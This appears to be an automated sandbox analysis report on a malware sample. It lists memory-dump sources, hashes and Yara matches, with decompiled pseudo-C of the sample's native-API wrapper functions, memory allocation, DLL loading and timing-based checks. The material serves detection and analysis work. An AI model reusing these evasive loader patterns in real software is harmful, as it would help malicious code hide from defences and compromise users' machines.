                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 65e81c182d41d235f77cd7f25c34a9aff97f0c1c12a0ddc2dea61fc8ad05ecc0
                                    • Instruction ID: 7af09155c3a3ea6f6908dff8a936ddfc52b19d0d9dbce5f650c4baf6d6e233c8
                                    • Opcode Fuzzy Hash: 65e81c182d41d235f77cd7f25c34a9aff97f0c1c12a0ddc2dea61fc8ad05ecc0
                                    • Instruction Fuzzy Hash: 09216A70E156199FDB09CFAAC94069EFAF7ABC9310F14C17AC408A7261EB344A46CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e075ed82a0ccf8add9b10eb7f07f287f79574b48f32de34c70a68e2b6315d835
                                    • Instruction ID: f61b6ee6582a6d7903394716c969ff59b947b93cd136bd6d3b04a52738edf817
                                    • Opcode Fuzzy Hash: e075ed82a0ccf8add9b10eb7f07f287f79574b48f32de34c70a68e2b6315d835
                                    • Instruction Fuzzy Hash: 9311DD71E046189BEB1CCF6BD94479EFAF3AFC8200F04C17AC808A6265EB741546CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7f3e2f387edd71e332250eb2a9892211e0abcbd0e5abab93567ce5635bfc083e
                                    • Instruction ID: 880276d48e5fca9de99a48a269ed2b04e105d8ebe17d6b38b062eedbc4049563
                                    • Opcode Fuzzy Hash: 7f3e2f387edd71e332250eb2a9892211e0abcbd0e5abab93567ce5635bfc083e
                                    • Instruction Fuzzy Hash: 31117C30D092188BDB14CFA5C908BEEFBF4AB4E310F289069D401B3290D7788A84DF68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Executed Functions

                                    C-Code - Quality: 24%
                                    			E004182AC(void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36, intOrPtr _a40, intOrPtr _a44) {
                                    				intOrPtr* __esi;
                                    				void* __ebp;
                                    				void* _t22;
                                    				void* _t32;
                                    				void* _t33;
                                    				intOrPtr* _t34;
                                    
                                    				if(__eflags != 0) {
                                    					asm("in al, dx");
                                    					_t17 = _a8;
                                    					_t34 = _a8 + 0xc48;
                                    					E00418DB0(_t32, _t17, _t34,  *((intOrPtr*)(_t17 + 0x10)), 0, 0x2a);
                                    					_t6 =  &_a36; // 0x413d42
                                    					_t12 =  &_a12; // 0x413d42
                                    					_t22 =  *((intOrPtr*)( *_t34))( *_t12, _a16, _a20, _a24, _a28, _a32,  *_t6, _a40, _a44, _t33); // executed
                                    					return _t22;
                                    				} else {
                                    					__ebp = __esp;
                                    					__eax = _a4;
                                    					_t14 = __eax + 0x10; // 0x300
                                    					_t15 = __eax + 0xc4c; // 0x40972f
                                    					__esi = _t15;
                                    					E00418DB0(__edi, _a4, __esi,  *_t14, 0, 0x2b) =  *__esi;
                                    					__eax =  *((intOrPtr*)( *__esi))(_a8, __ebp);
                                    					_pop(__esi);
                                    					__ebp = __esi;
                                    					return  *__esi;
                                    				}
                                    			}










                                    APIs
                                    • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FileRead
                                    • String ID: B=A$B=A
                                    • API String ID: 2738559852-2767357659

                                    C-Code - Quality: 21%
                                    			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                    				void* _t18;
                                    				void* _t27;
                                    				void* _t28;
                                    				intOrPtr* _t29;
                                    
                                    				asm("in al, dx");
                                    				_t13 = _a4;
                                    				_t29 = _a4 + 0xc48;
                                    				E00418DB0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                    				_t6 =  &_a32; // 0x413d42
                                    				_t12 =  &_a8; // 0x413d42
                                    				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28); // executed
                                    				return _t18;
                                    			}








                                    APIs
                                    • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FileRead
                                    • String ID: B=A$B=A
                                    • API String ID: 2738559852-2767357659

                                    C-Code - Quality: 100%
                                    			E00409B10(void* __ebx, void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
                                    				char* _v8;
                                    				struct _EXCEPTION_RECORD _v12;
                                    				struct _OBJDIR_INFORMATION _v16;
                                    				char _v536;
                                    				void* _t15;
                                    				struct _OBJDIR_INFORMATION _t17;
                                    				struct _OBJDIR_INFORMATION _t18;
                                    				void* _t32;
                                    				void* _t33;
                                    				void* _t34;
                                    
                                    				_v8 =  &_v536;
                                    				_t15 = E0041AB40( &_v12, 0x104, _a8);
                                    				_t33 = _t32 + 0xc;
                                    				if(_t15 != 0) {
                                    					_t17 = E0041AF60(__eflags, _v8);
                                    					_t34 = _t33 + 4;
                                    					__eflags = _t17;
                                    					if(_t17 != 0) {
                                    						E0041B1E0(__ebx, __edi,  &_v12, 0);
                                    						_t34 = _t34 + 8;
                                    					}
                                    					_t18 = E004192F0(_v8);
                                    					_v16 = _t18;
                                    					__eflags = _t18;
                                    					if(_t18 == 0) {
                                    						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                    						return _v16;
                                    					}
                                    					return _t18;
                                    				} else {
                                    					return _t15;
                                    				}
                                    			}














                                    APIs
                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Load
                                    • String ID:
                                    • API String ID: 2234796835-0

                                    C-Code - Quality: 100%
                                    			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                    				long _t21;
                                    				void* _t31;
                                    
                                    				_t3 = _a4 + 0xc40; // 0xc40
                                    				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                    				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                    				return _t21;
                                    			}






                                    APIs
                                    • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0

                                    C-Code - Quality: 72%
                                    			E0041838B(signed int __ebx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                    				long _t16;
                                    				void* _t25;
                                    				signed int _t29;
                                    
                                    				_t18 = __ebx & _t29;
                                    				asm("outsd");
                                    				 *((intOrPtr*)(_t18 + 0x55)) =  *((intOrPtr*)((__ebx & _t29) + 0x55)) - _t18;
                                    				_push(_t29);
                                    				_t12 = _a4;
                                    				_t5 = _t12 + 0xc60; // 0xca0
                                    				E00418DB0(_t25, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                    				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                    				return _t16;
                                    			}







                                    APIs
                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateMemoryVirtual
                                    • String ID:
                                    • API String ID: 2167126740-0
                                    • Opcode ID: 90b4b4d6a87fec0e3ee07628d04621249aeea7168c3680a55fd00696984ddb13
                                    • Instruction ID: e33716c473c1a6e546ff089dea15d4fac4e1bd4e2ae9c8d374149b142e10dc26
                                    • Opcode Fuzzy Hash: 90b4b4d6a87fec0e3ee07628d04621249aeea7168c3680a55fd00696984ddb13
                                    • Instruction Fuzzy Hash: 1BF0F2B6200208ABCB18DF99DC95EEB77A9BF88354F15815DBE1897241C630E950CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                    				long _t14;
                                    				void* _t21;
                                    
                                    				_t3 = _a4 + 0xc60; // 0xca0
                                    				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                    				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                    				return _t14;
                                    			}






                                    APIs
                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateMemoryVirtual
                                    • String ID:
                                    • API String ID: 2167126740-0
                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                    • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                    • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004182E0(intOrPtr _a4, void* _a8) {
                                    				long _t8;
                                    				void* _t11;
                                    
                                    				_t5 = _a4;
                                    				_t2 = _t5 + 0x10; // 0x300
                                    				_t3 = _t5 + 0xc50; // 0x409733
                                    				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                    				_t8 = NtClose(_a8); // executed
                                    				return _t8;
                                    			}






                                    APIs
                                    • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Close
                                    • String ID:
                                    • API String ID: 3535843008-0
                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                    • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                    • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                    • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                    • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                    • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                    • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                    • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                    • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 93%
                                    			E004088A0(intOrPtr _a4) {
                                    				intOrPtr _v8;
                                    				char _v24;
                                    				char _v284;
                                    				char _v804;
                                    				char _v840;
                                    				void* _t24;
                                    				void* _t31;
                                    				void* _t33;
                                    				void* _t34;
                                    				void* _t39;
                                    				void* _t50;
                                    				intOrPtr _t52;
                                    				void* _t53;
                                    				void* _t54;
                                    				void* _t55;
                                    				void* _t56;
                                    
                                    				_t52 = _a4;
                                    				_t39 = 0; // executed
                                    				_t24 = E00406E00(_t52,  &_v24); // executed
                                    				_t54 = _t53 + 8;
                                    				if(_t24 != 0) {
                                    					E00407010( &_v24,  &_v840);
                                    					_t55 = _t54 + 8;
                                    					do {
                                    						E00419CC0( &_v284, 0x104);
                                    						E0041A330( &_v284,  &_v804);
                                    						_t56 = _t55 + 0x10;
                                    						_t50 = 0x4f;
                                    						while(1) {
                                    							_t31 = E00413DC0(E00413D60(_t52, _t50),  &_v284);
                                    							_t56 = _t56 + 0x10;
                                    							if(_t31 != 0) {
                                    								break;
                                    							}
                                    							_t50 = _t50 + 1;
                                    							if(_t50 <= 0x62) {
                                    								continue;
                                    							} else {
                                    							}
                                    							goto L8;
                                    						}
                                    						_t9 = _t52 + 0x14; // 0xffffe1b5
                                    						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                    						_t39 = 1;
                                    						L8:
                                    						_t33 = E00407040( &_v24,  &_v840);
                                    						_t55 = _t56 + 8;
                                    					} while (_t33 != 0 && _t39 == 0);
                                    					_t34 = E004070C0(_t52,  &_v24); // executed
                                    					if(_t39 == 0) {
                                    						asm("rdtsc");
                                    						asm("rdtsc");
                                    						_v8 = _t34 - 0 + _t34;
                                    						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                    					}
                                    					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                    					_t20 = _t52 + 0x31; // 0x5608758b
                                    					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                    					return 1;
                                    				} else {
                                    					return _t24;
                                    				}
                                    			}

                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                    • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                    • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                    • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID: hA
                                    • API String ID: 1279760036-1221461045
                                    • Opcode ID: 269900346b7c3cf1095cd121d9a13cafab3a846ac9cdea7f6ce23ea480356605
                                    • Instruction ID: a92fe9ae98136920995dbb6c9f8f490c0a28fc78c4328f558ebb06bb2a3a51d6
                                    • Opcode Fuzzy Hash: 269900346b7c3cf1095cd121d9a13cafab3a846ac9cdea7f6ce23ea480356605
                                    • Instruction Fuzzy Hash: D1F04F763002156FDA24EF99EC84EE7736DEF88360B10855AFA4D9B201D931EA5587E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 74%
                                    			E00407260(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
                                    				char _v67;
                                    				char _v68;
                                    				void* _t12;
                                    				intOrPtr* _t13;
                                    				int _t14;
                                    				long _t22;
                                    				intOrPtr* _t26;
                                    				void* _t27;
                                    				void* _t31;
                                    
                                    				_t31 = __eflags;
                                    				_v68 = 0;
                                    				E00419D10( &_v67, 0, 0x3f);
                                    				E0041A8F0( &_v68, 3);
                                    				_t12 = E00409B10(__ebx, __edi, _t31, _a4 + 0x1c,  &_v68); // executed
                                    				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                    				_t26 = _t13;
                                    				if(_t26 != 0) {
                                    					_push(__edi);
                                    					_t22 = _a8;
                                    					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
                                    					_t33 = _t14;
                                    					if(_t14 == 0) {
                                    						_t14 =  *_t26(_t22, 0x8003, _t27 + (E00409270(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
                                    					}
                                    					return _t14;
                                    				}
                                    				return _t13;
                                    			}

                                    APIs
                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID:
                                    • API String ID: 1836367815-0
                                    • Opcode ID: e734902a588a01c6e2b051ebf769807b15cf7e0c0c64d341f33143468a58d1a4
                                    • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                    • Opcode Fuzzy Hash: e734902a588a01c6e2b051ebf769807b15cf7e0c0c64d341f33143468a58d1a4
                                    • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418528
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: 540bfc6e7dd3a05608229c53d547d5ceb1e2f8f92c80232f9867aac60bdf6548
                                    • Instruction ID: 90963e86cd57150ed095c23e32252a4bc52356d2fee715913416bcb79a385e3c
                                    • Opcode Fuzzy Hash: 540bfc6e7dd3a05608229c53d547d5ceb1e2f8f92c80232f9867aac60bdf6548
                                    • Instruction Fuzzy Hash: B60117B2200208BBCB44DF99DC80DEB77ADEF8C354F118249FA0D97241DA34E951CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 82%
                                    			E004184B4(void* __ecx, void* __edx, void* _a4, long _a8, void* _a12) {
                                    				intOrPtr _v0;
                                    				char _t12;
                                    
                                    				_push(0x3c);
                                    				 *((intOrPtr*)(__ecx + 0x5506bd67)) =  *((intOrPtr*)(__ecx + 0x5506bd67)) - __edx;
                                    				_t9 = _v0;
                                    				_t5 = _t9 + 0xc74; // 0xc74
                                    				E00418DB0(0x21c5d300, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
                                    				_t12 = RtlFreeHeap(_a4, _a8, _a12); // executed
                                    				return _t12;
                                    			}

                                    APIs
                                    • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: 217add93ce38b03714e6ccd2c066df5cfb3b48363690f25c7b28eacd6981adb7
                                    • Instruction ID: c5ff80edf742f8a68fdad7a16a09cf22f23f4b8e9e8c60093caf9f0ba1e94a67
                                    • Opcode Fuzzy Hash: 217add93ce38b03714e6ccd2c066df5cfb3b48363690f25c7b28eacd6981adb7
                                    • Instruction Fuzzy Hash: ADE06DB1200304ABDB14DF65DC49EA7376CAF88750F114199FE085B382D531E901CBE4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                    				char _t10;
                                    				void* _t15;
                                    
                                    				_t3 = _a4 + 0xc74; // 0xc74
                                    				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                    				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                    				return _t10;
                                    			}

                                    APIs
                                    • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                    • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                    • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 36%
                                    			E00418480(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16) {
                                    				intOrPtr _t9;
                                    				void* _t10;
                                    				void* _t12;
                                    				void* _t15;
                                    
                                    				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                    				_t9 = _a12;
                                    				_t12 = _a8;
                                    				asm("les edx, [edx+edx*2]");
                                    				_push(_t9);
                                    				_t10 = RtlAllocateHeap(_t12); // executed
                                    				return _t10;
                                    			}

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                    • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                    • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                    				int _t10;
                                    				void* _t15;
                                    
                                    				E00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                    				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                    				return _t10;
                                    			}

